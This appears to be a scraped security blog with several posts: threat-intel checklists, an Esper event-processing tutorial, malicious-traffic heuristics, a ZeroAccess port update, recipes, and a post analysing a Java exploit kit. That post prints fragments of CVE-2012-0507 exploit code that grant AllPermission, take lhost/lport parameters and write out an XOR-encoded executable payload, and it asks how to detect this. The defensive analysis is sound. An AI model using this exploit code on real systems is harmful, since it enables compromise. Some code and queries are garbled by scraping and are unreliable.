Security Incident Workflow


Image | Posted on by | Leave a comment

Threat Intel Program – Quick Reference

Cyber Attack Taxonomy


Threat Intel Taxonomy


Threat Intel Classification




  • The decision by a competitor or potential competitor to enter your market space
    (e.g. a foreign competitor’s new five-year plan now shows interest in developing a domestic capability in a technology your company is known for).
  • Indications that a competitor, or foreign government, may have previously acquired intellectual property via cyber exploitation.
  • Indications that a competitor, or foreign government, is establishing an atypical influential relationship with a portion of your supply chain.
  • Indications that your corporate strategic objectives may be threatened due to adversarial cyber activity
  • Trend analysis indicating the technical direction in which an adversary’s capabilities are evolving.
  • Indications that an adversary has selected an avenue of approach for targeting your organisation.
  • Indications that an adversary is building capability to exploit a particular avenue of approach.
  • The revelation of adversary tactics, techniques, and procedures.
  • Understanding of the adversary operational cycle (i.e. decision making, acquisitions, command and control [C2] methods for both the technology and the personnel).
  • Technical, social, legal, financial, or other vulnerabilities that the adversary has.
  • Information that enables the defender to influence an adversary as they move through the kill chain.
  • Signature or behaviour detection efforts, and in advanced cases, some form of kill chain.
  • Analysis based upon known actors or network behavioural patterns.
  • Host-based security system alerts.
  • Hosts identified by known IOCs
    (c2, processes, files, user_agents)


Threat Intel vs Cyber Attacks


Adversaries vs Targets


US TRADOC Cyber Operations Model – Sample




Threat Intel Program Checklist

  • Biannual process in place to derive, update and capture prioritized intelligence requirements (PIRs) that map to your organization’s business risks.
  • Tracking of ad hoc requirements that meet and do not meet standing PIRs in order to identify emerging intelligence needs and requirements.
  • Documented intelligence production requirements.
  • Documented collection requirements.
  • Documented mapping of collection requirements to internal teams/capabilities or external (intelligence) providers/vendors (guidance).
  • Regular assessment and tracking of guidance versus output from internal capabilities and external (intelligence) providers/vendors (collection management).
  • Intelligence collection is easily consumable, i.e. in a threat intelligence platform (TIP).
  • Documented intelligence production style guide.
  • Documented intelligence review and editing process.
  • Formalized intelligence product style and templates.
  • Intelligence products include future predictions and doesn’t just report on facts.
  • Sources used in intelligence products are linked to the relevant source and graded.
  • Knowledge gaps are identified in intelligence products and pushed back into the requirements part of the intelligence cycle.
  • Feedback is received from your intelligence consumer/customer and used to drive further intelligence collection and production if needed.
  • Key Performance Indicators (KPIs) are generated for the intelligence program.
  • KPIs are generated for each part of the intelligence cycle including for internal and external sources of finished intelligence products and intelligence collection.
  • Have an intelligence (collection) management function that tracks and prioritizes requirements and tasks them as assigned guidance.
References/Additional Resources
Posted in Resources, security, Security Management | Leave a comment

Intro to Event Stream Analysis (ESA) & Complex Event Processing (ESPER)

Exploring Event Driven Architectures with Esper

  • Event stream processing (ESP)
    • monitors streams of event data, analyzing those events for matching conditions and then notifies listeners
  • Complex event processing (CEP)
    • allows the detection of patterns among events


Complex Event Processing (CEP), or Event Stream Stream Processing (ESP) are technologies commonly used in Event-Driven systems. These type of systems consume, and react to a stream of event data in real time. Typically these will be things like financial trading, fraud identification and process monitoring systems – where you need to identify, make sense of, and react quickly to emerging patterns in a stream of data events.


A CEP system is like your typical database model turned upside down. Whereas a typical database stores data, and runs queries against the data, a CEP data stores queries, and runs data through the queries.

To do this it basically needs:

  • Data – in the form of ‘Events’
  • Queries – using EPL (‘Event Processing Language’)
  • Listeners – code that ‘does something’ if the queries return results

The Esper query language provides a rich syntax allowing complex temporal logic to be expressed, and includes features such as:

  • Event filtering
  • Sliding window and aggregation (count all assets reported in the last 30 seconds)
  • Grouped windows and output rate limiting (get a count per zone of the last 10 minutes per zone)
  • Joins and outer joins (also joins between event streams)
  • Integration with historic or reference data (accessing relational databases)
  • Creation of virtual streams that all statements can access



  • Esper EQL is an object-oriented event stream query language very similar to SQL in its syntax but that significantly differs to be able to deal with sliding window of streams of data.
  • Esper also includes a pattern language that provides for stateful (state-machine) event pattern matching.
  • EQL and patterns can be used alone or can also be combined to express complex temporal logic.
Example 1: Terminal Monitoring/Alerting

Events are as below
BaseTerminalEvent       (Super Event)

  • Checkin, Completed, Cancelled, Status, OutOfOrder, LowPaper    (Inherited Events)
select * from LowPaper Report when you observe an LowPaper Event
select * from LowPaper
select * from OutOfOrder
Report when you observe an LowPaper Event
Report when you observe an OutOfOrder Event
select a,b from pattern

[ every a=LowPaper or every b=OutOfOrder]

Report when you observe an LowPaper Event
Report when you observe an OutOfOrder Event
select * from BaseTerminalEvent
where type = 'LowPaper' or type = 'OutOfOrder'
Report when you observe an LowPaper Event
Report when you observe an OutOfOrder Event
select 'terminal 1 is offline' from pattern
[ every timer:interval(60 sec) ->
  (timer:interval(65 sec) and not Status( = 'T1'))


output first every 5 minutes

Detecting the Absence of Status Events

  • Status Event is produced by terminal every 1 minute
  • Detect of this event is not produced by the terminal

Repeat the action for every 60 seconds
we combine this with a not operator to check for absence of Status events. A 65-second interval during which we look for Status events allows 5 seconds to account for a possible delay in transmission or processing:

  • Create a Pattern
    • Frequency: 60 secs
    • Event Criteria
      • No Status event with’T1′ in a window of 65 seconds
  • We only want to be alerted first time it happens and do not alert for next 5 minutes when this pattern triggers
select count(*) from minutes) Report number of Checkin Events during a window of 10 minutes
select type, count(*)
from minutes)
group by type
output all every 1 minutes
For a window of last 10 minutes for BaseTerminalEvent

  • Report Event type, Count
  • Group by Event type

Alert every 1 minute and not at each change

Example 2: Tweets Monitoring (
SELECT sum(retweets) from TweetEvent

(retweets >= 10).win:length(5)

find the sum of retweets of last 5 tweets which saw more than 10 retweets

  • You can use min(), max(), sum(), count(), avg()
SELECT timezone, sum(retweets)
from sec)
group by timezone
number of retweets, grouped by timezone, buffered in 10 second increments
SELECT sum(retweets)
from sec)
output snapshot every 30 events
Report the sum of retweets
for TweetEvent s of sliding 60 second window,
and emit count every 30 events
SELECT timezone, sum(retweets)

from sec)

group by timezone

having sum(retweets) > 10

Report total number of retweets by timezone
for TweetEvent s of batch of 10 second window
where the window of TweetEvents grouped by timezone
and report if each window of events has total retweets > 10

side notes minutes) This tells the engine to consider a time window consisting of

only the last 10 minutes of the Checkin event stream. sec) buffered in 10 second increments

  • time()  is applied for sliding window of events
  • time_batch() is applied for batch of events
output first every 5 minutes Alert first time when pattern matched and suppress for next 5 minutes
output all every 1 minutes Alert every 1 minute and not at each change
output snapshot every 30 events Alert every 30 events that matched the pattern
Status( = 'T1') Status Event where = ‘T1’
Posted in Uncategorized | Leave a comment

Artifacts of a Malicious Traffic

While Investigating the Suspicious Traffic, it is important for an analyst to be clear what is really suspicious or not.
Below are few artifacts an analyst can observe to conclude if it is malicious or not.


1)      IP belong to High Risk Hosting Provider / Internet User IP

2)      Has Malicious References on sites such as,,,,,,, etc.,



If at least three of below criteria is matched, the domain would be malicious

1)      Domain is NOT Popular

2)      Has Malicious References on sites such as,,,,,,, etc.,

3)      Domain created date is less than 1 Year

4)      Bluecoat Category is none / Suspicious / Malicious sources / Malicious Botnets / Dynamic DNS Hosts

5)      No Site description




1)      User-Agent Field gives the idea what Is the application

Some malwares uses UA that appears legitimate, Hence check the UA used in other traffic for that IP at the same time

Some Malware uses exact UA that browser on infected machine uses, In that case check the header for other fields as described below to confirm if the web request is made by Browser/Malware.

2)  Below fields in the Header indicate the request is made by a browser .

If they are not present, mostly the request is made by some malware/application


 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Cache-Control: max-stale=0

Pragma: no-cache

Connection: Keep-Alive

3)      Referrer Field gives the Clue from where the user was redirected to

After confirming that Web Request is made by Browser,

If Referrer field is available,

a)      If Referrer URL is – indicating user infected from Phishing/SPAM

b)      If Referrer URL is good blog/forum – indicating user infected from compromised site

If Referrer field is unavailable – User might have been Phished/SPAMed . (User clicking link from email in outlook)


Posted in security | Tagged , , , | Leave a comment

Callback IP List – 16/8/2012

Posted in Uncategorized | Tagged | Leave a comment

ZeroAccess/Siresef Update

Until last week ZeroAccess/Siresef Infected hosts contacting C&C domain on ports 16464, 16465, 16470 and 16471.
Currently it switched to port 34354 is now going on wild.

Watch out your network for machines going on to internet ips on this port

Posted in Uncategorized | Tagged | Leave a comment

New Mode of delivering Malware Payload by Exploit Kits

Huh… Exploit writers have come up with new mode of delivering malware payload.

The current pattern of exploit kit is malicious webpage -> Exploit (Java/PDF/others) -> Exploits download the malicious executable.
we have devised appropriate signatures for these patterns, malware authors has come up with new mode of delivering malware payload.

They are embedding malware payload as HEX in the malicious webpage and passing it as a parameter to the exploit.
The exploit bypasses security controls and writes the HEX as the file and runs on the victim system.

Malicious Webpage that triggering Exploit Applet, The param, converted to binary and XOR’d with 0x77, retunes an EXE

<param name="data" value="3A2DE777747777777377777788887777CF777777777777773777777…

Code that reads the Malware Payload Content

            ConfusingClassLoader confusingclassloader = confuser.confuse(getClass().getClassLoader());
            String as[] = {
                "", "$pr"
            String as1[] = {
                "/m/y/py.class", "/m/y/py$pr.class"
            String s = getParameter("lport");
            ConfusingClassLoader.defineAndCreate(confusingclassloader, as, new byte[][] {
                loadClass(as1[0]), loadClass(as1[1])
            }, getParameter("data"), getParameter("jar"), getParameter("lhost"), s != null ? Integer.parseInt(s) : 4444);

Exploit code (Java/CVE-2012-0507) that bypasses security restrictions

public static void defineAndCreate(ConfusingClassLoader confusingclassloader, String as[], byte abyte0[][], String s, String s1, String s2, int i)

            Permissions permissions = new Permissions();
            permissions.add(new AllPermission());
            ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(null, new Certificate[0]), permissions);
            Class class1 = confusingclassloader.defineClass(as[0], abyte0[0], 0, abyte0[0].length, protectiondomain);
            confusingclassloader.defineClass(as[1], abyte0[1], 0, abyte0[1].length, protectiondomain);
            Field field = class1.getField("data");
            Field field1 = class1.getField("jar");
            Field field2 = class1.getField("lhost");
            Field field3 = class1.getField("lport");
            field.set(null, s);
            field1.set(null, s1);
            field2.set(null, s2);
            field3.set(null, Integer.valueOf(i));

Code that writes the content to file

                bufferedreader = new BufferedReader(new InputStreamReader(is));
                bufferedwriter = new BufferedWriter(new OutputStreamWriter(os));
                char ac[] = new char[8192];
                int i;
                while((i =, 0, ac.length)) > 0) 
                   bufferedwriter.write(ac, 0, i);

Just scratching my head how to detect it?

#exploit, #javacve-2012-0507, #malware-payload-delivery

Posted in security | Tagged , , | Leave a comment

Raw Food recipes from Life Regenerator Dan


Notes Compiled by Uma Mahesh

  1. Almond Coconut Yogurt


Mung Bean Salad


Sprouted Mung beans + kottimera + tomato + onions

Salad Dressing

Olive Oil + Orange Juice + Sea Salt

Spicy Cabbage Almond Salad


Cabbage + Almond

Salad Dressing

Apple Cider Vinegar + Honey + Garlic Powder

+ Pandu Mirapakai Karam + Saindhava Lavanam

Seseme tahini

Salad Dips


1 cup Sesame seeds + 4 cloves of garlic + Zucchini +

Dates + Lemon (/Orange) + Water(/Coconut water)


Carrot , Broccoli, Calliflower, any veggie

Coconut Almond Yogurt & Avacado Dressing

Salad Dressing


Basil/kottimera (Any herb) +

Coconut Almond Yogurt +

Dates +Garlic Cloves + Saindava Lavanam)

+ Pandu Mirapa (If required hot)


    Lettuce (Any Leafy Veggie) + Sprouts + Onion + Cucumber

Raw Tacos

Cilantra -> Kottimira

Salad Base (Taco Meat)


    Walnutes + Cumin + Paprika + Sea Salt

Salad Cheese

Sprouted pumpkin seeds + Nutritional Yeast

Gaucamole Salad

Salad Dressing


(Tomatos + Onions + Garlic + Chili + Kottimera)

+ Avacado + Corn


Zucchini slices

Butternut Squash Pasta

Blend (Squash Pasta)

    Tomatos ( + Sun Dried Tomatoes) + Kottimira + Olive oil

+ lemon + garlic + sea salt + oregano + (All Herb Powders)


Gummadikayi noodles (Shredder (gummadikai) )

Mango Dill Jalapeno Dressing

Blend (Dips)

    Mangoes + Mint Leaves + Pachimirapakai


Romaine Lettuce

Butternut Squash Pudding


Pumpkin + Coconot almond yogurt + protein powder + cinnamon

Posted in health | Tagged , , | Leave a comment

Business case to convince Management for Security Incident Response center

Today i am reading through mandiant document named ‘Planning for Failure”. It contains real data that emphasizes on breaches and necessity to plan for failure to protect. For any company or security consultancy that real data can be used for business case for getting budget for security. Hence i am including that document here.


This document can also be helpful to CISO to show to management and startup guidelines to initiate building up Incident Response Center.


Posted in Articles, Security Management | Tagged , | Leave a comment

PCI Compliance Dashboard guiding PCI Compliance journey

A well composed guide for PCI Compliance,
it includes “SANS Top 20 Critical Security Controls” and many others.

It helps giving simple and clear guidelines for ensuring security for any organization irrespective of PCI compliance mandate.

It can be downloaded from

Posted in Articles, Resources, Security Management | Tagged | Leave a comment